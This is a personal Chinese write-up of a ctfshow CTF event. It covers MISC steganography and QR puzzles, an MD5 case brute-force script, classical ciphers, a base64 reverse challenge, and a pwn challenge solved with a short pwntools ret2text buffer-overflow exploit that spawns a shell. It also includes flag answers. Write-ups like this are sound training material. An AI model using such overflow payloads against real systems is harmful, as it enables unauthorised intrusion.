ctfshow单身杯(dsb)个人wp

MISC签到

wp直接都写在题目描述里面了
先进行一个破的爆
在这里插入图片描述
右键记事本打开发现base64编码
在这里插入图片描述
解码得到半个二维码
在这里插入图片描述
zsteg得到半个flag
在这里插入图片描述
最后将二维码反色后补全就能得到另一半flag,按照格式改好提交就行

没大没小的串串

import hashlib
import random
def huan(zm):
    if ord(zm)>=65 and ord(zm)<=90:
        return zm.lower()
    if ord(zm)>=97 and ord(zm)<=122:
        return zm.upper()
    return zm
flag="y0U_RE4lLy_kn0W_TH1S_ConGr4tUlAT10Ns"
while 1:
    flag1=''
    for i in range(len(flag)):
        a=random.randint(0,1)
        if a==1:
            flag1+=huan(flag[i])
        if a==0:
            flag1+=flag[i]
    b=hashlib.md5(flag1.encode(encoding='utf-8'))
    if str(b.hexdigest())=='7513209051f455fa44d0fa5cd0f3e051':
        print(flag1)
        print(b.hexdigest())
        break

古典base

在这里插入图片描述
得到奇怪的东西,栅栏+base64就出来了
在这里插入图片描述
在这里插入图片描述

re签到

右键记事本打开,这一坨复制下来
在这里插入图片描述

三次base64
在这里插入图片描述

pwn签到

gets无限溢出
在这里插入图片描述
白给后门
在这里插入图片描述
一般的ret2text

from pwn import * 
elf=ELF("./pwn01")
io=process('./pwn01')
#io=remote('pwn.challenge.ctf.show',28111)
shell=0x80484F6
payload=(b'a'*0x10)+(b'a'*4)+p32(shell)
sleep(0.1)
io.sendline(payload)
io.interactive()
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值